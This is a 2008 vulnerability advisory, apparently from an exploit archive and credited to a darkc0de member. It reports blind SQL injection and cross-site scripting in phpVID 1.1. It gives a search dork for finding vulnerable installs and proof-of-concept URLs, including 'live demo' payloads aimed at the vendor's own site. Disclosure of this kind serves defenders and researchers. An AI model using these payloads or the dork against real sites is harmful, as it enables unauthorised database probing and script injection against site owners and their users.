[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : phpVID 1.1 (XSS/SQL) Multiple Remote Vulnerabilities
# Published : 2008-09-10
# Author : r45c4l
# Previous Title : Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit
# Next Title : Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability
################################################################
# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ _ __| _/____ #
# / __ |__ \_ __ |/ // ___/ /_ / __ |/ __ #
# / /_/ | / __ | | / < ___ _/ / /_/ ___/ #
# ____ |(______/__| |__|_ \_____>_____ /_____|____ #
# / / / #
# ___________ ______ _ __ #
# _/ ____ __ _/ __ / / / #
# ___| | / ___/ / #
# ___ >__| ___ >/_/ #
# est.2007 / / forum.darkc0de.com #
################################################################
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
# and all darkc0de members ---#
################################################################
#
# Author: r45c4l
#
# Home : www.darkc0de.com
#
# Email : r45c4l@hotmail.com
#
# Share the c0de!
#
################################################################
#
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
#
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
# Vulnerable Version: 1.1
#
###########################################################
#
# d0rk:Powered By Vastal I-Tech's phpVID.
#
#
###########################################################
Vulnerabilities
Blind SQL Injection in "groups.php" in the "cat" parameter.
Cross Site Scripting in "search_results.php"
POC:
http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.site.com/search_results.php?query=[XSS]
Live Demo:
http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>
###########################################################
#
# Bug discovered : 10 Sep.2008
###########################################################
# www.Syue.com [2008-09-10]